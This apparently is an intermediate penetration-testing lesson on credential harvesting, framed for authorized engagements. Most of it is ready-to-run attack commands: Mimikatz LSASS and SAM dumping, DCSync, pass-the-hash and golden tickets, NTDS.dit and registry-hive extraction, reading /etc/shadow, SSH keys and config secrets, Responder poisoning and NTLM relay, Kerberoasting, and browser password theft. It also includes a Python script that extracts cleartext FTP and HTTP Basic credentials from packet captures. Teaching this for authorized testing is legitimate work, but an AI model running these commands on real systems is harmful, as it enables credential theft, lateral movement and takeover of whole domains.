Credential Harvesting

Intermediate · 35 min · Writeup

Extracting credentials from compromised systems

Learning Objectives

  • Dump password hashes
  • Extract credentials from memory
  • Find stored passwords
  • Use credentials for lateral movement

Credentials are the keys to the kingdom. A single valid username and password can unlock dozens of systems, while a domain admin hash might give you control of an entire organization. Credential harvesting is the art of extracting these precious secrets from compromised systems.

Unlike password attacks, where you're guessing credentials, here you're extracting them from memory, files, and configurations. Much faster, much quieter, and often more effective.

Sensitive Data

Credential harvesting captures real passwords and hashes. Handle them responsibly: secure storage, limited retention, proper disclosure to the client. Never use captured credentials outside your engagement scope.

Credential Types

  • Plaintext Passwords: The holy grail, immediately usable
  • Password Hashes: NT hashes can be cracked or used directly for Pass-the-Hash; Net-NTLMv2 challenge/responses captured on the wire can only be cracked or relayed
  • Kerberos Tickets: Used for Pass-the-Ticket attacks
  • SSH Keys: Private keys provide direct access
  • API Keys/Tokens: Access to services and APIs
  • Certificates: Can be used for authentication (Kerberos PKINIT, client TLS)

Windows Memory Credentials

Mimikatz

The legendary credential extraction tool. Dumps passwords, hashes, tickets, and more from Windows memory.

powershell
# Run Mimikatz
mimikatz.exe

# Enable SeDebugPrivilege (needed for the sekurlsa:: commands)
privilege::debug

# Dump logon-session credentials from LSASS: plaintext where cached, NTLM hashes, Kerberos keys
sekurlsa::logonpasswords

# Impersonate SYSTEM, then dump the local SAM (lsadump::sam fails as a plain admin)
token::elevate
lsadump::sam

# Dump cached domain credentials (DCC2/MSCache2: crack with hashcat -m 2100, not usable for Pass-the-Hash)
lsadump::cache

# DCSync: ask a DC to replicate one account's secrets (needs replication rights; works from any domain-joined host)
lsadump::dcsync /domain:corp.local /user:Administrator

# Export Kerberos tickets to .kirbi files
sekurlsa::tickets /export

# Pass-the-Hash: spawn cmd.exe in a new logon session that authenticates with the NTLM hash
sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:cmd.exe

From Meterpreter

bash
# Load the Mimikatz extension
meterpreter > load kiwi

# Dump credentials
meterpreter > creds_all
meterpreter > creds_msv        # NTLM hashes
meterpreter > creds_kerberos
meterpreter > creds_wdigest    # plaintext only when WDigest caching is on (off by default since Windows 8.1 / 2012 R2)

# Dump SAM
meterpreter > hashdump

# Golden ticket: needs the krbtgt NTLM hash (dcsync_ntlm krbtgt) and the domain SID
meterpreter > golden_ticket_create -d corp.local -u Administrator -s <DOMAIN_SID> -k <KRBTGT_NTLM> -t /tmp/golden.kirbi

SeDebugPrivilege Required

Mimikatz's sekurlsa:: commands read LSASS memory and need SeDebugPrivilege, which only administrators hold (privilege::debug enables it); lsadump::sam additionally needs SYSTEM. Some techniques work without it: saving the registry hives only needs local admin, and DCSync needs replication rights in the domain, not local privileges. If LSA Protection (RunAsPPL) or Credential Guard is enabled, direct LSASS reads fail even as SYSTEM.

Windows File Credentials

powershell
# SAM and SYSTEM hives (requires admin); SECURITY holds cached domain creds and LSA secrets
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
# Extract offline with secretsdump.py

# NTDS.dit (run on a domain controller): snapshot the AD database into C:\temp
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
# Creates C:\temp\Active Directory\ntds.dit and C:\temp\registry\SYSTEM (needed for the boot key)

# Credential Manager
cmdkey /list
dir C:\Users\*\AppData\Local\Microsoft\Credentials\

# Browser passwords
# Chrome - encrypted with DPAPI, decrypt in the user's context
# Firefox - key4.db and logins.json

# Unattended install files (AutoLogon / local admin passwords, base64-obfuscated or plaintext)
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml

# Group Policy Preferences (legacy): cpassword is AES-encrypted with a key Microsoft published; decrypt with gpp-decrypt
findstr /S /I cpassword \\corp.local\sysvol\*.xml

Extracting Offline

bash
# Extract from SAM/SYSTEM backup (add -security security.save if you also saved HKLM\SECURITY)
secretsdump.py -sam sam.save -system system.save LOCAL

# Extract from NTDS.dit (the SYSTEM hive from the same snapshot supplies the boot key)
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# Remote extraction with credentials (DCSync when the target is a DC, SAM/LSA otherwise)
secretsdump.py domain/user:password@target
secretsdump.py -hashes :NTLM_HASH domain/user@target

Linux Credentials

bash
# Shadow file (requires root); $6$ hashes are sha512crypt, hashcat -m 1800, or unshadow + john
cat /etc/shadow

# History files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.psql_history
grep -iE "pass|secret|token" ~/.bash_history /home/*/.bash_history 2>/dev/null

# SSH keys
ls -la ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/id_ed25519
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null

# Memory dump of a running process (e.g. a service that holds credentials)
gcore -o /tmp/dump $(pgrep -f "process_name")
strings /tmp/dump.* | grep -i password

# Web application configs
cat /var/www/*/wp-config.php
cat /var/www/*/.env
grep -r "password" /var/www/ 2>/dev/null

# Database configs
cat /etc/mysql/debian.cnf    # debian-sys-maint account, full MySQL access
cat ~/.pgpass

# Git configs
cat ~/.git-credentials       # https://user:token@host URLs in plaintext
cat ~/.gitconfig

Searching for Credentials

bash
# Find files with passwords
grep -r "password" /home/ 2>/dev/null
grep -r "pass" /var/www/ 2>/dev/null
grep -r "secret" /opt/ 2>/dev/null

# Find config files that mention a password
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.config" -exec grep -l "password" {} \; 2>/dev/null

# Find private keys (OpenSSH-format keys do not say "RSA" in the header)
find / -name "*.pem" 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -type f -exec grep -lE "BEGIN (RSA |OPENSSH |EC |DSA )?PRIVATE KEY" {} \; 2>/dev/null

Network Credential Capture

bash
# Responder - poison LLMNR/NBT-NS/mDNS and capture Net-NTLMv2 challenge/responses
# (-w serves WPAD, -v is verbose; in Responder 3.x -d means DHCP injection and is loud)
sudo responder -I eth0 -wv

# Captured hashes are saved under the logs directory
# Crack with hashcat -m 5600 (NTLMv2); these cannot be passed, only cracked or relayed

# Capture with tcpdump
sudo tcpdump -i eth0 -w capture.pcap port 21 or port 23 or port 80 or port 110

# Extract credentials from pcap
# FTP, Telnet, HTTP Basic Auth and POP3 are cleartext

# SMB relay (targets where SMB signing is not required; disable Responder's SMB and HTTP servers first)
sudo ntlmrelayx.py -tf targets.txt -smb2support
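"Extract credentials from pcap" is left as a comment above, so here is an added example for this page (not code from tcpdump, Responder or any other project) that does it for the two cleartext protocols a pentester meets most: it parses a pcap file at the byte level with `struct`, reassembles each TCP flow by sequence number, and pulls FTP `USER`/`PASS` pairs and HTTP Basic `Authorization` headers. The capture it reads is constructed in memory, with the `PASS` segment deliberately placed before its `USER` to show why reordering matters. Only Ethernet/IPv4/TCP is handled; VLAN-tagged or IPv6 traffic would need extra cases.

```python
"""Pull cleartext credentials (FTP USER/PASS, HTTP Basic) out of a pcap.

Added example for this page. The capture is constructed with struct so the
script runs offline; only Ethernet/IPv4/TCP frames are handled.
"""
import base64
import re
import struct
from collections import defaultdict


def _ipv4(addr):
    return bytes(int(o) for o in addr.split("."))


def _frame(src, dst, sport, dport, seq, payload):
    """Ethernet + IPv4 + TCP (PSH/ACK) segment; checksums left zero, parser ignores them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, _ipv4(src), _ipv4(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(frames):
    """Little-endian pcap file, link type 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(f), len(f)) + f
    return out


def sample_capture():
    """Constructed FTP login and HTTP Basic request, client 10.0.0.5 -> server 10.0.0.20."""
    c, s = "10.0.0.5", "10.0.0.20"
    frames = [
        _frame(s, c, 21, 50123, 1000, b"220 FTP ready\r\n"),
        _frame(c, s, 50123, 21, 2012, b"PASS S3cret!\r\n"),  # arrives before USER on purpose
        _frame(c, s, 50123, 21, 2000, b"USER alice\r\n"),
        _frame(c, s, 50124, 80, 3000, b"GET /admin HTTP/1.1\r\nHost: intranet\r\n"),
        _frame(c, s, 50124, 80, 3037, b"Authorization: Basic " + base64.b64encode(b"bob:hunter2") + b"\r\n\r\n"),
    ]
    return build_pcap(frames)


def iter_frames(pcap):
    """Yield raw link-layer frames; handles both byte orders of the classic pcap header."""
    magic, = struct.unpack("<I", pcap[:4])
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    linktype, = struct.unpack(endian + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl]
        off += incl


def tcp_segments(pcap):
    """Yield ((src, sport, dst, dport), seq, payload) for TCP segments carrying data."""
    for frame in iter_frames(pcap):
        if frame[12:14] != b"\x08\x00":  # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:  # not TCP
            continue
        total, = struct.unpack("!H", ip[2:4])
        tcp = ip[ihl:total]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            src = ".".join(map(str, ip[12:16]))
            dst = ".".join(map(str, ip[16:20]))
            yield (src, sport, dst, dport), seq, payload


FTP_USER = re.compile(rb"^USER (\S+)\r?$", re.M)
FTP_PASS = re.compile(rb"^PASS (\S+)\r?$", re.M)
BASIC = re.compile(rb"^Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)\r?$", re.M | re.I)


def extract_credentials(pcap):
    """Group segments per flow, order them by seq, then match the cleartext patterns."""
    streams = defaultdict(list)
    for key, seq, payload in tcp_segments(pcap):
        streams[key].append((seq, payload))
    creds = []
    for (src, sport, dst, dport), segs in streams.items():
        data = b"".join(p for _, p in sorted(segs))  # reorder by sequence number
        if dport == 21:
            for u, p in zip(FTP_USER.findall(data), FTP_PASS.findall(data)):
                creds.append({"proto": "ftp", "host": f"{dst}:{dport}", "user": u.decode(), "password": p.decode()})
        for m in BASIC.finditer(data):
            try:
                user, _, pw = base64.b64decode(m.group(1)).decode().partition(":")
            except (ValueError, UnicodeDecodeError):
                continue
            creds.append({"proto": "http-basic", "host": f"{dst}:{dport}", "user": user, "password": pw})
    return creds


if __name__ == "__main__":
    for c in extract_credentials(sample_capture()):
        print(f"{c['proto']:<11} {c['host']:<16} {c['user']}:{c['password']}")
```

For a real file use `extract_credentials(open("capture.pcap", "rb").read())`; pcapng captures (the Wireshark default) have a different container format and need to be converted with `editcap -F pcap` first.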

Responder is Powerful

Responder poisons LLMNR, NBT-NS and mDNS name lookups and captures Net-NTLMv2 challenge/responses from the connections that follow. Run it and wait: credentials come to you as systems try to resolve mistyped or stale names. A Net-NTLMv2 response is not the NT hash, so it cannot be used for Pass-the-Hash; crack it with hashcat or relay it live with ntlmrelayx to hosts that do not require SMB signing.

Browser Credentials

bash
# Firefox - passwords stored in logins.json, encryption key in key4.db (master password needed if one is set)
firefox_decrypt.py

# Chrome - encrypted with DPAPI
# Decrypt in the user's context, or with the user's Windows password / DPAPI master key offline
# Tools: SharpChrome, LaZagne

# LaZagne - multi-browser
python laZagne.py browsers

# All credentials with LaZagne
python laZagne.py all

SharpChrome Example

powershell
# Dump Chrome passwords (run in the target user's context so DPAPI can decrypt)
.\SharpChrome.exe logins

# Dump Chrome cookies
.\SharpChrome.exe cookies

Domain Credential Harvesting

bash
# DCSync attack (requires replication rights: Domain Admins, or an account delegated DS-Replication-Get-Changes-All)
secretsdump.py domain/admin:password@dc_ip -just-dc

# Or from mimikatz
lsadump::dcsync /domain:corp.local /all /csv

# Kerberoasting - request service tickets for accounts with SPNs, written hashcat-ready
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt

# Crack with hashcat (13100 is the RC4/etype 23 TGS-REP; AES tickets are 19600/19700)
hashcat -m 13100 kerberoast.txt wordlist.txt

# AS-REP Roasting (accounts with "Do not require Kerberos preauthentication" set)
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP -format hashcat -outputfile asrep.txt

# Crack with hashcat
hashcat -m 18200 asrep.txt wordlist.txt

Credential Harvesting Methodology

Systematic Credential Harvesting

1. Memory dump: Mimikatz, hashdump for in-memory creds
2. File search: config files, history, keys
3. Registry: SAM, cached credentials, LSA secrets
4. Browsers: saved passwords, cookies
5. Network: Responder for hash capture
6. Domain: DCSync, Kerberoasting if applicable
7. Test reuse: try captured creds on other systems

Knowledge Check


What Windows privilege is required for Mimikatz to dump credentials?

Challenges

Windows Cred Dump

Challenge
🔥 intermediate

From a Windows system with local admin, extract: local user hashes, cached domain credentials, and any stored browser passwords.


Linux Credential Hunt

Challenge
🌱 beginner

As root on a Linux server, find all credentials: user hashes, SSH keys, and any passwords in config files.


Key Takeaways

  • Mimikatz is essential for Windows credential extraction
  • Credentials exist in memory, files, registry, and network traffic
  • NT hashes can be used directly (Pass-the-Hash) without cracking
  • Responder passively captures Net-NTLMv2 responses from network traffic, which can be cracked or relayed but not passed
  • DCSync extracts all domain credentials with replication rights
  • Always check for credential reuse across systems
  • Handle harvested credentials securely and responsibly